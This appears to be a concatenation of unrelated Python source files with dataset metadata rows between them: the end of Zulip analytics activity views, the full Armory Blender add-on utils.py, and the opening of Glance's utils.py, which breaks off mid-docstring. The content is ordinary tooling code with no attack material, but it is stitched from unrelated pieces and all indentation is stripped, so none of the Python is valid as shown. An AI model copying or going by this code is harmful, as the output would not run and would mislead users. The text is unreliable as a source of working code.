(query in ('send_message_backend', '/api/v1/send_message')
and client.name not in ('Android', 'ZulipiOS')
and client.name not like 'test: Zulip%%'
)
or
query like '%%external%%'
group by string_id, client_name
having max(last_visit) > now() - interval '2 week'
order by string_id, client_name
'''
cols = [
'Realm',
'Client',
'Hits',
'Last time'
]
pages.append(get_page(query, cols, title))
###
title = 'Integrations by client'
query = '''
select
case
when query like '%%external%%' then split_part(query, '/', 5)
else client.name
end client_name,
realm.string_id,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
(query in ('send_message_backend', '/api/v1/send_message')
and client.name not in ('Android', 'ZulipiOS')
and client.name not like 'test: Zulip%%'
)
or
query like '%%external%%'
group by client_name, string_id
having max(last_visit) > now() - interval '2 week'
order by client_name, string_id
'''
cols = [
'Client',
'Realm',
'Hits',
'Last time'
]
pages.append(get_page(query, cols, title))
return pages
@zulip_internal
@has_request_variables
def get_activity(request):
# type: (HttpRequest) -> HttpResponse
duration_content, realm_minutes = user_activity_intervals() # type: Tuple[mark_safe, Dict[str, float]]
counts_content = realm_summary_table(realm_minutes) # type: str
data = [
('Counts', counts_content),
('Durations', duration_content),
]
for page in ad_hoc_queries():
data.append((page['title'], page['content']))
title = 'Activity'
return render_to_response(
'analytics/activity.html',
dict(data=data, title=title, is_home=True),
request=request
)
def get_user_activity_records_for_realm(realm, is_bot):
# type: (str, bool) -> QuerySet
fields = [
'user_profile__full_name',
'user_profile__email',
'query',
'client__name',
'count',
'last_visit',
]
records = UserActivity.objects.filter(
user_profile__realm__string_id=realm,
user_profile__is_active=True,
user_profile__is_bot=is_bot
)
records = records.order_by("user_profile__email", "-last_visit")
records = records.select_related('user_profile', 'client').only(*fields)
return records
def get_user_activity_records_for_email(email):
# type: (str) -> List[QuerySet]
fields = [
'user_profile__full_name',
'query',
'client__name',
'count',
'last_visit'
]
records = UserActivity.objects.filter(
user_profile__email=email
)
records = records.order_by("-last_visit")
records = records.select_related('user_profile', 'client').only(*fields)
return records
def raw_user_activity_table(records):
# type: (List[QuerySet]) -> str
cols = [
'query',
'client',
'count',
'last_visit'
]
def row(record):
# type: (QuerySet) -> List[Any]
return [
record.query,
record.client.name,
record.count,
format_date_for_activity_reports(record.last_visit)
]
rows = list(map(row, records))
title = 'Raw Data'
return make_table(title, cols, rows)
def get_user_activity_summary(records):
# type: (List[QuerySet]) -> Dict[str, Dict[str, Any]]
#: `Any` used above should be `Union(int, datetime)`.
#: However current version of `Union` does not work inside other function.
#: We could use something like:
# `Union[Dict[str, Dict[str, int]], Dict[str, Dict[str, datetime]]]`
#: but that would require this long `Union` to carry on throughout inner functions.
summary = {} # type: Dict[str, Dict[str, Any]]
def update(action, record):
# type: (str, QuerySet) -> None
if action not in summary:
summary[action] = dict(
count=record.count,
last_visit=record.last_visit
)
else:
summary[action]['count'] += record.count
summary[action]['last_visit'] = max(
summary[action]['last_visit'],
record.last_visit
)
if records:
summary['name'] = records[0].user_profile.full_name
for record in records:
client = record.client.name
query = record.query
update('use', record)
if client == 'API':
m = re.match('/api/.*/external/(.*)', query)
if m:
client = m.group(1)
update(client, record)
if client.startswith('desktop'):
update('desktop', record)
if client == 'website':
update('website', record)
if ('send_message' in query) or re.search('/api/.*/external/.*', query):
update('send', record)
if query in ['/json/update_pointer', '/json/users/me/pointer', '/api/v1/update_pointer']:
update('pointer', record)
update(client, record)
return summary
def format_date_for_activity_reports(date):
# type: (Optional[datetime]) -> str
if date:
return date.astimezone(eastern_tz).strftime('%Y-%m-%d %H:%M')
else:
return ''
def user_activity_link(email):
# type: (str) -> mark_safe
url_name = 'analytics.views.get_user_activity'
url = urlresolvers.reverse(url_name, kwargs=dict(email=email))
email_link = '<a href="%s">%s</a>' % (url, email)
return mark_safe(email_link)
def realm_activity_link(realm_str):
# type: (str) -> mark_safe
url_name = 'analytics.views.get_realm_activity'
url = urlresolvers.reverse(url_name, kwargs=dict(realm_str=realm_str))
realm_link = '<a href="%s">%s</a>' % (url, realm_str)
return mark_safe(realm_link)
def realm_client_table(user_summaries):
# type: (Dict[str, Dict[str, Dict[str, Any]]]) -> str
exclude_keys = [
'internal',
'name',
'use',
'send',
'pointer',
'website',
'desktop',
]
rows = []
for email, user_summary in user_summaries.items():
email_link = user_activity_link(email)
name = user_summary['name']
for k, v in user_summary.items():
if k in exclude_keys:
continue
client = k
count = v['count']
last_visit = v['last_visit']
row = [
format_date_for_activity_reports(last_visit),
client,
name,
email_link,
count,
]
rows.append(row)
rows = sorted(rows, key=lambda r: r[0], reverse=True)
cols = [
'Last visit',
'Client',
'Name',
'Email',
'Count',
]
title = 'Clients'
return make_table(title, cols, rows)
def user_activity_summary_table(user_summary):
# type: (Dict[str, Dict[str, Any]]) -> str
rows = []
for k, v in user_summary.items():
if k == 'name':
continue
client = k
count = v['count']
last_visit = v['last_visit']
row = [
format_date_for_activity_reports(last_visit),
client,
count,
]
rows.append(row)
rows = sorted(rows, key=lambda r: r[0], reverse=True)
cols = [
'last_visit',
'client',
'count',
]
title = 'User Activity'
return make_table(title, cols, rows)
def realm_user_summary_table(all_records, admin_emails):
# type: (List[QuerySet], Set[Text]) -> Tuple[Dict[str, Dict[str, Any]], str]
user_records = {}
def by_email(record):
# type: (QuerySet) -> str
return record.user_profile.email
for email, records in itertools.groupby(all_records, by_email):
user_records[email] = get_user_activity_summary(list(records))
def get_last_visit(user_summary, k):
# type: (Dict[str, Dict[str, datetime]], str) -> Optional[datetime]
if k in user_summary:
return user_summary[k]['last_visit']
else:
return None
def get_count(user_summary, k):
# type: (Dict[str, Dict[str, str]], str) -> str
if k in user_summary:
return user_summary[k]['count']
else:
return ''
def is_recent(val):
# type: (Optional[datetime]) -> bool
age = datetime.now(val.tzinfo) - val
return age.total_seconds() < 5 * 60
rows = []
for email, user_summary in user_records.items():
email_link = user_activity_link(email)
sent_count = get_count(user_summary, 'send')
cells = [user_summary['name'], email_link, sent_count]
row_class = ''
for field in ['use', 'send', 'pointer', 'desktop', 'ZulipiOS', 'Android']:
visit = get_last_visit(user_summary, field)
if field == 'use':
if visit and is_recent(visit):
row_class += ' recently_active'
if email in admin_emails:
row_class += ' admin'
val = format_date_for_activity_reports(visit)
cells.append(val)
row = dict(cells=cells, row_class=row_class)
rows.append(row)
def by_used_time(row):
# type: (Dict[str, Any]) -> str
return row['cells'][3]
rows = sorted(rows, key=by_used_time, reverse=True)
cols = [
'Name',
'Email',
'Total sent',
'Heard from',
'Message sent',
'Pointer motion',
'Desktop',
'ZulipiOS',
'Android',
]
title = 'Summary'
content = make_table(title, cols, rows, has_row_class=True)
return user_records, content
@zulip_internal
def get_realm_activity(request, realm_str):
# type: (HttpRequest, str) -> HttpResponse
data = [] # type: List[Tuple[str, str]]
all_user_records = {} # type: Dict[str, Any]
try:
admins = Realm.objects.get(string_id=realm_str).get_admin_users()
except Realm.DoesNotExist:
return HttpResponseNotFound("Realm %s does not exist" % (realm_str,))
admin_emails = {admin.email for admin in admins}
for is_bot, page_title in [(False, 'Humans'), (True, 'Bots')]:
all_records = list(get_user_activity_records_for_realm(realm_str, is_bot))
user_records, content = realm_user_summary_table(all_records, admin_emails)
all_user_records.update(user_records)
data += [(page_title, content)]
page_title = 'Clients'
content = realm_client_table(all_user_records)
data += [(page_title, content)]
page_title = 'History'
content = sent_messages_report(realm_str)
data += [(page_title, content)]
realm_link = 'https://stats1.zulip.net:444/render/?from=-7days'
realm_link += '&target=stats.gauges.staging.users.active.%s.0_16hr' % (realm_str,)
title = realm_str
return render_to_response(
'analytics/activity.html',
dict(data=data, realm_link=realm_link, title=title),
request=request
)
@zulip_internal
def get_user_activity(request, email):
# type: (HttpRequest, str) -> HttpResponse
records = get_user_activity_records_for_email(email)
data = [] # type: List[Tuple[str, str]]
user_summary = get_user_activity_summary(records)
content = user_activity_summary_table(user_summary)
data += [('Summary', content)]
content = raw_user_activity_table(records)
data += [('Info', content)]
title = email
return render_to_response(
'analytics/activity.html',
dict(data=data, title=title),
request=request
)
| apache-2.0 | 1,357,763,504,589,575,200 | 32.502262 | 123 | 0.557969 | false | 3.885798 | false | false | false |
| luboslenco/cyclesgame | blender/arm/utils.py | 1 | 24354 |
import bpy
import json
import os
import glob
import platform
import zipfile
import re
import subprocess
import webbrowser
import numpy as np
import arm.lib.armpack
import arm.make_state as state
import arm.log as log
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
return json.JSONEncoder.default(self, obj)
def write_arm(filepath, output):
if filepath.endswith('.zip'):
with zipfile.ZipFile(filepath, 'w', zipfile.ZIP_DEFLATED) as zip_file:
if bpy.data.worlds['Arm'].arm_minimize:
zip_file.writestr('data.arm', arm.lib.armpack.packb(output))
else:
zip_file.writestr('data.json', json.dumps(output, sort_keys=True, indent=4, cls=NumpyEncoder))
else:
if bpy.data.worlds['Arm'].arm_minimize:
with open(filepath, 'wb') as f:
f.write(arm.lib.armpack.packb(output))
else:
filepath_json = filepath.split('.arm')[0] + '.json'
with open(filepath_json, 'w') as f:
f.write(json.dumps(output, sort_keys=True, indent=4, cls=NumpyEncoder))
def unpack_image(image, path, file_format='JPEG'):
print('Armory Info: Unpacking to ' + path)
image.filepath_raw = path
image.file_format = file_format
image.save()
def convert_image(image, path, file_format='JPEG'):
# Convert image to compatible format
print('Armory Info: Converting to ' + path)
ren = bpy.context.scene.render
orig_quality = ren.image_settings.quality
orig_file_format = ren.image_settings.file_format
orig_color_mode = ren.image_settings.color_mode
ren.image_settings.quality = 90
ren.image_settings.file_format = file_format
if file_format == 'PNG':
ren.image_settings.color_mode = 'RGBA'
image.save_render(path, scene=bpy.context.scene)
ren.image_settings.quality = orig_quality
ren.image_settings.file_format = orig_file_format
ren.image_settings.color_mode = orig_color_mode
def blend_name():
return bpy.path.basename(bpy.context.blend_data.filepath).rsplit('.')[0]
def build_dir():
return 'build_' + safestr(blend_name())
def get_fp():
wrd = bpy.data.worlds['Arm']
if wrd.arm_project_root != '':
return bpy.path.abspath(wrd.arm_project_root)
else:
s = bpy.data.filepath.split(os.path.sep)
s.pop()
return os.path.sep.join(s)
def get_fp_build():
return get_fp() + '/' + build_dir()
def get_os():
s = platform.system()
if s == 'Windows':
return 'win'
elif s == 'Darwin':
return 'mac'
else:
return 'linux'
def get_gapi():
wrd = bpy.data.worlds['Arm']
if state.is_export:
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
return getattr(item, target_to_gapi(item.arm_project_target))
if wrd.arm_runtime == 'Browser':
return 'webgl'
return arm.utils.get_player_gapi()
def get_rp():
wrd = bpy.data.worlds['Arm']
return wrd.arm_rplist[wrd.arm_rplist_index]
def bundled_sdk_path():
if get_os() == 'mac':
# SDK on MacOS is located in .app folder due to security
p = bpy.app.binary_path
if p.endswith('Contents/MacOS/blender'):
return p[:-len('Contents/MacOS/blender')] + '/armsdk/'
else:
return p[:-len('Contents/MacOS/./blender')] + '/armsdk/'
elif get_os() == 'linux':
# /blender
return bpy.app.binary_path.rsplit('/', 1)[0] + '/armsdk/'
else:
# /blender.exe
return bpy.app.binary_path.replace('\\', '/').rsplit('/', 1)[0] + '/armsdk/'
# Passed by load_post handler when armsdk is found in project folder
use_local_sdk = False
def get_sdk_path():
preferences = bpy.context.preferences
addon_prefs = preferences.addons["armory"].preferences
p = bundled_sdk_path()
if use_local_sdk:
return get_fp() + '/armsdk/'
elif os.path.exists(p) and addon_prefs.sdk_bundled:
return p
else:
return addon_prefs.sdk_path
def get_ide_path():
preferences = bpy.context.preferences
addon_prefs = preferences.addons["armory"].preferences
return '' if not hasattr(addon_prefs, 'ide_path') else addon_prefs.ide_path
def get_ffmpeg_path():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return addon_prefs.ffmpeg_path
def get_renderdoc_path():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
p = addon_prefs.renderdoc_path
if p == '' and get_os() == 'win':
pdefault = 'C:\\Program Files\\RenderDoc\\qrenderdoc.exe'
if os.path.exists(pdefault):
p = pdefault
return p
def get_player_gapi():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 'opengl' if not hasattr(addon_prefs, 'player_gapi_' + get_os()) else getattr(addon_prefs, 'player_gapi_' + get_os())
def get_code_editor():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 'kodestudio' if not hasattr(addon_prefs, 'code_editor') else addon_prefs.code_editor
def get_ui_scale():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 1.0 if not hasattr(addon_prefs, 'ui_scale') else addon_prefs.ui_scale
def get_khamake_threads():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 1 if not hasattr(addon_prefs, 'khamake_threads') else addon_prefs.khamake_threads
def get_compilation_server():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return False if not hasattr(addon_prefs, 'compilation_server') else addon_prefs.compilation_server
def get_save_on_build():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return False if not hasattr(addon_prefs, 'save_on_build') else addon_prefs.save_on_build
def get_viewport_controls():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 'qwerty' if not hasattr(addon_prefs, 'viewport_controls') else addon_prefs.viewport_controls
def get_legacy_shaders():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return False if not hasattr(addon_prefs, 'legacy_shaders') else addon_prefs.legacy_shaders
def get_relative_paths():
# Convert absolute paths to relative
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return False if not hasattr(addon_prefs, 'relative_paths') else addon_prefs.relative_paths
def get_node_path():
if get_os() == 'win':
return get_sdk_path() + '/nodejs/node.exe'
elif get_os() == 'mac':
return get_sdk_path() + '/nodejs/node-osx'
else:
return get_sdk_path() + '/nodejs/node-linux64'
def get_kha_path():
if os.path.exists('Kha'):
return 'Kha'
return get_sdk_path() + '/Kha'
def get_haxe_path():
if get_os() == 'win':
return get_kha_path() + '/Tools/haxe/haxe.exe'
elif get_os() == 'mac':
return get_kha_path() + '/Tools/haxe/haxe-osx'
else:
return get_kha_path() + '/Tools/haxe/haxe-linux64'
def get_khamake_path():
return get_kha_path() + '/make'
def krom_paths(bin_ext=''):
sdk_path = get_sdk_path()
if arm.utils.get_os() == 'win':
krom_location = sdk_path + '/Krom'
krom_path = krom_location + '/Krom' + bin_ext + '.exe'
elif arm.utils.get_os() == 'mac':
krom_location = sdk_path + '/Krom/Krom.app/Contents/MacOS'
krom_path = krom_location + '/Krom' + bin_ext
else:
krom_location = sdk_path + '/Krom'
krom_path = krom_location + '/Krom' + bin_ext
return krom_location, krom_path
def fetch_bundled_script_names():
wrd = bpy.data.worlds['Arm']
wrd.arm_bundled_scripts_list.clear()
os.chdir(get_sdk_path() + '/armory/Sources/armory/trait')
for file in glob.glob('*.hx'):
wrd.arm_bundled_scripts_list.add().name = file.rsplit('.')[0]
script_props = {}
script_props_defaults = {}
def fetch_script_props(file):
with open(file) as f:
if '/' in file:
file = file.split('/')[-1]
if '\\' in file:
file = file.split('\\')[-1]
name = file.rsplit('.')[0]
script_props[name] = []
script_props_defaults[name] = []
lines = f.read().splitlines()
read_prop = False
for l in lines:
if not read_prop:
read_prop = l.lstrip().startswith('@prop')
if read_prop and 'var ' in l:
p = l.split('var ')[1]
valid_prop = False
# Has type
if ':' in p:
# Fetch default value
if '=' in p:
s = p.split('=')
ps = s[0].split(':')
prop = (ps[0].strip(), ps[1].split(';')[0].strip())
prop_value = s[1].split(';')[0].replace('\'', '').replace('"', '').strip()
valid_prop = True
else:
ps = p.split(':')
prop = (ps[0].strip(), ps[1].split(';')[0].strip())
prop_value = ''
valid_prop = True
# Fetch default value
elif '=' in p:
s = p.split('=')
prop = (s[0].strip(), None)
prop_value = s[1].split(';')[0].replace('\'', '').replace('"', '').strip()
valid_prop = True
# Register prop
if valid_prop:
script_props[name].append(prop)
script_props_defaults[name].append(prop_value)
read_prop = False
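# Hedged example of the trait source format parsed above (illustrative
# Haxe snippet):
#     @prop
#     var speed: Float = 2.5;
# yields script_props[name] == [('speed', 'Float')] and
# script_props_defaults[name] == ['2.5'].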
def fetch_script_names():
if bpy.data.filepath == "":
return
wrd = bpy.data.worlds['Arm']
# Sources
wrd.arm_scripts_list.clear()
sources_path = get_fp() + '/Sources/' + safestr(wrd.arm_project_package)
if os.path.isdir(sources_path):
os.chdir(sources_path)
# glob supports recursive search since Python 3.5, so this covers the Python bundled with both Blender 2.79 and 2.8
for file in glob.glob('**/*.hx', recursive=True):
name = file.rsplit('.')[0]
# Replace path separators with package syntax so the trait is searchable in Blender's traits "Class" dropdown
wrd.arm_scripts_list.add().name = name.replace(os.sep, '.')
fetch_script_props(file)
# Canvas
wrd.arm_canvas_list.clear()
canvas_path = get_fp() + '/Bundled/canvas'
if os.path.isdir(canvas_path):
os.chdir(canvas_path)
for file in glob.glob('*.json'):
wrd.arm_canvas_list.add().name = file.rsplit('.')[0]
os.chdir(get_fp())
def fetch_wasm_names():
if bpy.data.filepath == "":
return
wrd = bpy.data.worlds['Arm']
# WASM modules
wrd.arm_wasm_list.clear()
sources_path = get_fp() + '/Bundled'
if os.path.isdir(sources_path):
os.chdir(sources_path)
for file in glob.glob('*.wasm'):
name = file.rsplit('.')[0]
wrd.arm_wasm_list.add().name = name
os.chdir(get_fp())
def fetch_trait_props():
for o in bpy.data.objects:
fetch_prop(o)
for s in bpy.data.scenes:
fetch_prop(s)
def fetch_prop(o):
for item in o.arm_traitlist:
if item.name not in script_props:
continue
props = script_props[item.name]
defaults = script_props_defaults[item.name]
# Remove old props
for i in range(len(item.arm_traitpropslist) - 1, -1, -1):
ip = item.arm_traitpropslist[i]
# if ip.name not in props:
if ip.name.split('(')[0] not in [p[0] for p in props]:
item.arm_traitpropslist.remove(i)
# Add new props
for i in range(0, len(props)):
p = props[i]
found = False
for ip in item.arm_traitpropslist:
if ip.name.replace(')', '').split('(')[0] == p[0]:
found = ip
break
# Not in list
if not found:
prop = item.arm_traitpropslist.add()
prop.name = p[0] + ('(' + p[1] + ')' if p[1] else '')
prop.value = defaults[i]
if found:
prop = item.arm_traitpropslist[found.name]
f = found.name.replace(')', '').split('(')
# Default value added and current value is blank (no override)
if (not found.value and defaults[i]):
prop.value = defaults[i]
# Type has changed, update displayed name
if (len(f) == 1 or (len(f) > 1 and f[1] != p[1])):
prop.name = p[0] + ('(' + p[1] + ')' if p[1] else '')
def fetch_bundled_trait_props():
# Bundled script props
for o in bpy.data.objects:
for t in o.arm_traitlist:
if t.type_prop == 'Bundled Script':
file_path = get_sdk_path() + '/armory/Sources/armory/trait/' + t.name + '.hx'
if os.path.exists(file_path):
fetch_script_props(file_path)
fetch_prop(o)
def update_trait_collections():
for col in bpy.data.collections:
if col.name.startswith('Trait|'):
bpy.data.collections.remove(col)
for o in bpy.data.objects:
for t in o.arm_traitlist:
if 'Trait|' + t.name not in bpy.data.collections:
col = bpy.data.collections.new('Trait|' + t.name)
else:
col = bpy.data.collections['Trait|' + t.name]
col.objects.link(o)
def to_hex(val):
return '#%02x%02x%02x%02x' % (int(val[3] * 255), int(val[0] * 255), int(val[1] * 255), int(val[2] * 255))
def color_to_int(val):
return (int(val[3] * 255) << 24) + (int(val[0] * 255) << 16) + (int(val[1] * 255) << 8) + int(val[2] * 255)
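# Worked example for the two helpers above: val = (1.0, 0.5, 0.0, 1.0) as
# RGBA floats packs alpha into the top byte, so to_hex(val) == '#ffff7f00'
# and color_to_int(val) == 0xFFFF7F00.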
def safesrc(s):
s = safestr(s).replace('.', '_').replace('-', '_').replace(' ', '')
if s[0].isdigit():
s = '_' + s
return s
def safestr(s):
for c in r'[]/\;,><&*:%=+@!#^()|?^':
s = s.replace(c, '_')
return ''.join([i if ord(i) < 128 else '_' for i in s])
def asset_name(bdata):
s = bdata.name
# Append library name if linked
if bdata.library != None:
s += '_' + bdata.library.name
return s
def asset_path(s):
return s[2:] if s[:2] == '//' else s # Remove leading '//'
def extract_filename(s):
return os.path.basename(asset_path(s))
def get_render_resolution(scene):
render = scene.render
scale = render.resolution_percentage / 100
return int(render.resolution_x * scale), int(render.resolution_y * scale)
def get_project_scene_name():
return get_active_scene().name
def get_active_scene():
if not state.is_export:
return bpy.context.scene
else:
wrd = bpy.data.worlds['Arm']
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
return item.arm_project_scene
def logic_editor_space(context_screen=None):
if context_screen == None:
context_screen = bpy.context.screen
if context_screen != None:
areas = context_screen.areas
for area in areas:
for space in area.spaces:
if space.type == 'NODE_EDITOR':
if space.node_tree != None and space.node_tree.bl_idname == 'ArmLogicTreeType':
return space
return None
def voxel_support():
# macos does not support opengl 4.5, needs metal
return state.target != 'html5' and get_os() != 'mac'
def get_cascade_size(rpdat):
cascade_size = int(rpdat.rp_shadowmap_cascade)
# Clamp to 4096 per cascade
if int(rpdat.rp_shadowmap_cascades) > 1 and cascade_size > 4096:
cascade_size = 4096
return cascade_size
def check_saved(self):
if bpy.data.filepath == "":
msg = "Save blend file first"
self.report({"ERROR"}, msg) if self != None else log.print_info(msg)
return False
return True
def check_path(s):
for c in r'[];><&*%=+@!#^()|?^':
if c in s:
return False
for c in s:
if ord(c) > 127:
return False
return True
def check_sdkpath(self):
s = get_sdk_path()
if check_path(s) == False:
msg = "SDK path '{0}' contains special characters. Please move SDK to different path for now.".format(s)
self.report({"ERROR"}, msg) if self != None else log.print_info(msg)
return False
else:
return True
def check_projectpath(self):
s = get_fp()
if check_path(s) == False:
msg = "Project path '{0}' contains special characters, build process may fail.".format(s)
self.report({"ERROR"}, msg) if self != None else log.print_info(msg)
return False
else:
return True
def disp_enabled(target):
rpdat = get_rp()
if rpdat.arm_rp_displacement == 'Tessellation':
return target == 'krom' or target == 'native'
return rpdat.arm_rp_displacement != 'Off'
def is_object_animation_enabled(bobject):
# Checks if animation is present and enabled
if bobject.arm_animation_enabled == False or bobject.type == 'BONE' or bobject.type == 'ARMATURE':
return False
if bobject.animation_data and bobject.animation_data.action:
return True
return False
def is_bone_animation_enabled(bobject):
# Checks if animation is present and enabled for parented armature
if bobject.parent and bobject.parent.type == 'ARMATURE':
if bobject.parent.arm_animation_enabled == False:
return False
# Check for present actions
adata = bobject.parent.animation_data
has_actions = adata != None and adata.action != None
if not has_actions and adata != None:
if hasattr(adata, 'nla_tracks') and adata.nla_tracks != None:
for track in adata.nla_tracks:
if track.strips == None:
continue
for strip in track.strips:
if strip.action == None:
continue
has_actions = True
break
if has_actions:
break
if adata != None and has_actions:
return True
return False
def export_bone_data(bobject):
return bobject.find_armature() and is_bone_animation_enabled(bobject) and get_rp().arm_skin == 'On'
def kode_studio_mklink_win(sdk_path, ide_path):
# Fight long-path issues on Windows
if not os.path.exists(ide_path + '/resources/app/kodeExtensions/kha/Kha'):
source = ide_path + '/resources/app/kodeExtensions/kha/Kha'
target = sdk_path + '/Kha'
subprocess.check_call('mklink /J "%s" "%s"' % (source, target), shell=True)
if not os.path.exists(ide_path + '/resources/app/kodeExtensions/krom/Krom'):
source = ide_path + '/resources/app/kodeExtensions/krom/Krom'
target = sdk_path + '/Krom'
subprocess.check_call('mklink /J "%s" "%s"' % (source, target), shell=True)
def kode_studio_mklink_linux(sdk_path, ide_path):
if not os.path.exists(ide_path + '/resources/app/kodeExtensions/kha/Kha'):
source = ide_path + '/resources/app/kodeExtensions/kha/Kha'
target = sdk_path + '/Kha'
subprocess.check_call('ln -s "%s" "%s"' % (target, source), shell=True)
if not os.path.exists(ide_path + '/resources/app/kodeExtensions/krom/Krom'):
source = ide_path + '/resources/app/kodeExtensions/krom/Krom'
target = sdk_path + '/Krom'
subprocess.check_call('ln -s "%s" "%s"' % (target, source), shell=True)
def kode_studio_mklink_mac(sdk_path, ide_path):
if not os.path.exists(ide_path + '/Contents/Resources/app/kodeExtensions/kha/Kha'):
source = ide_path + '/Contents/Resources/app/kodeExtensions/kha/Kha'
target = sdk_path + '/Kha'
subprocess.check_call('ln -fs "%s" "%s"' % (target, source), shell=True)
if not os.path.exists(ide_path + '/Contents/Resources/app/kodeExtensions/krom/Krom'):
source = ide_path + '/Contents/Resources/app/kodeExtensions/krom/Krom'
target = sdk_path + '/Krom'
subprocess.check_call('ln -fs "%s" "%s"' % (target, source), shell=True)
def get_kode_path():
p = get_ide_path()
if p == '':
if get_os() == 'win':
p = get_sdk_path() + '/win32'
elif get_os() == 'mac':
p = get_sdk_path() + '/KodeStudio.app'
else:
p = get_sdk_path() + '/linux64'
return p
def get_kode_bin():
p = get_kode_path()
if get_os() == 'win':
return p + '/Kode Studio.exe'
elif get_os() == 'mac':
return p + '/Contents/MacOS/Electron'
else:
return p + '/kodestudio'
def get_vscode_bin():
p = get_kode_path()
if get_os() == 'win':
return p + '/Code.exe'
elif get_os() == 'mac':
return p + '/Contents/MacOS/Electron'
else:
return p + '/code'
def kode_studio(hx_path=None):
project_path = arm.utils.get_fp()
kode_bin = get_kode_bin()
if not os.path.exists(kode_bin):
kode_bin = get_vscode_bin()
if os.path.exists(kode_bin) and get_code_editor() == 'kodestudio':
if arm.utils.get_os() == 'win':
# kode_studio_mklink_win(get_sdk_path(), get_kode_path())
args = [kode_bin, arm.utils.get_fp()]
if hx_path != None:
args.append(hx_path)
subprocess.Popen(args)
elif arm.utils.get_os() == 'mac':
# kode_studio_mklink_mac(get_sdk_path(), get_kode_path())
args = ['"' + kode_bin + '"' + ' "' + arm.utils.get_fp() + '"']
if hx_path != None:
args[0] += ' "' + hx_path + '"'
subprocess.Popen(args, shell=True)
else:
# kode_studio_mklink_linux(get_sdk_path(), get_kode_path())
args = [kode_bin, arm.utils.get_fp()]
if hx_path != None:
args.append(hx_path)
subprocess.Popen(args)
else:
fp = hx_path if hx_path != None else arm.utils.get_fp()
webbrowser.open('file://' + fp)
def def_strings_to_array(strdefs):
defs = strdefs.split('_')
defs = defs[1:]
defs = ['_' + d for d in defs] # Restore _
return defs
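# Illustrative only (hypothetical define string): def_strings_to_array()
# splits the packed '_A_B' form and restores each define's leading underscore.
def _demo_def_strings():
    assert def_strings_to_array('_MyDef_Other') == ['_MyDef', '_Other']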
def get_kha_target(target_name): # TODO: remove
if target_name == 'macos-hl':
return 'osx-hl'
elif target_name.startswith('krom'): # krom-windows
return 'krom'
elif target_name == 'custom':
return ''
return target_name
def target_to_gapi(arm_project_target):
# TODO: align target names
if arm_project_target == 'krom':
return 'arm_gapi_' + arm.utils.get_os()
elif arm_project_target == 'krom-windows':
return 'arm_gapi_win'
elif arm_project_target == 'windows-hl':
return 'arm_gapi_win'
elif arm_project_target == 'krom-linux':
return 'arm_gapi_linux'
elif arm_project_target == 'linux-hl':
return 'arm_gapi_linux'
elif arm_project_target == 'krom-macos':
return 'arm_gapi_mac'
elif arm_project_target == 'macos-hl':
return 'arm_gapi_mac'
elif arm_project_target == 'android-native-hl':
return 'arm_gapi_android'
elif arm_project_target == 'ios-hl':
return 'arm_gapi_ios'
elif arm_project_target == 'node':
return 'arm_gapi_html5'
else: # html5, custom
return 'arm_gapi_' + arm_project_target
def check_default_props():
wrd = bpy.data.worlds['Arm']
if len(wrd.arm_rplist) == 0:
wrd.arm_rplist.add()
wrd.arm_rplist_index = 0
if wrd.arm_project_name == '':
# Take blend file name
wrd.arm_project_name = arm.utils.blend_name()
def register(local_sdk=False):
global use_local_sdk
use_local_sdk = local_sdk
def unregister():
pass
|
lgpl-3.0
| 2,749,772,502,997,039,600
| 35.08
| 127
| 0.581137
| false
| 3.396179
| false
| false
| false
|
ozamiatin/glance
|
glance/common/utils.py
|
1
|
26028
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2014 SoftLayer Technologies, Inc.
# Copyright 2015 Mirantis, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
System-level utilities and helper functions.
"""
import errno
try:
from eventlet import sleep
except ImportError:
from time import sleep
from eventlet.green import socket
import functools
import os
import platform
import re
import subprocess
import sys
import uuid
from OpenSSL import crypto
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import netutils
from oslo_utils import strutils
import six
from webob import exc
from glance.common import exception
from glance import i18n
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
_ = i18n._
_LE = i18n._LE
FEATURE_BLACKLIST = ['content-length', 'content-type', 'x-image-meta-size']
# Whitelist of v1 API headers of form x-image-meta-xxx
IMAGE_META_HEADERS = ['x-image-meta-location', 'x-image-meta-size',
'x-image-meta-is_public', 'x-image-meta-disk_format',
'x-image-meta-container_format', 'x-image-meta-name',
'x-image-meta-status', 'x-image-meta-copy_from',
'x-image-meta-uri', 'x-image-meta-checksum',
'x-image-meta-created_at', 'x-image-meta-updated_at',
'x-image-meta-deleted_at', 'x-image-meta-min_ram',
'x-image-meta-min_disk', 'x-image-meta-owner',
'x-image-meta-store', 'x-image-meta-id',
'x-image-meta-protected', 'x-image-meta-deleted',
'x-image-meta-virtual_size']
GLANCE_TEST_SOCKET_FD_STR = 'GLANCE_TEST_SOCKET_FD'
def chunkreadable(iter, chunk_size=65536):
"""
Wrap a readable iterator with a reader yielding chunks of
a preferred size, otherwise leave iterator unchanged.
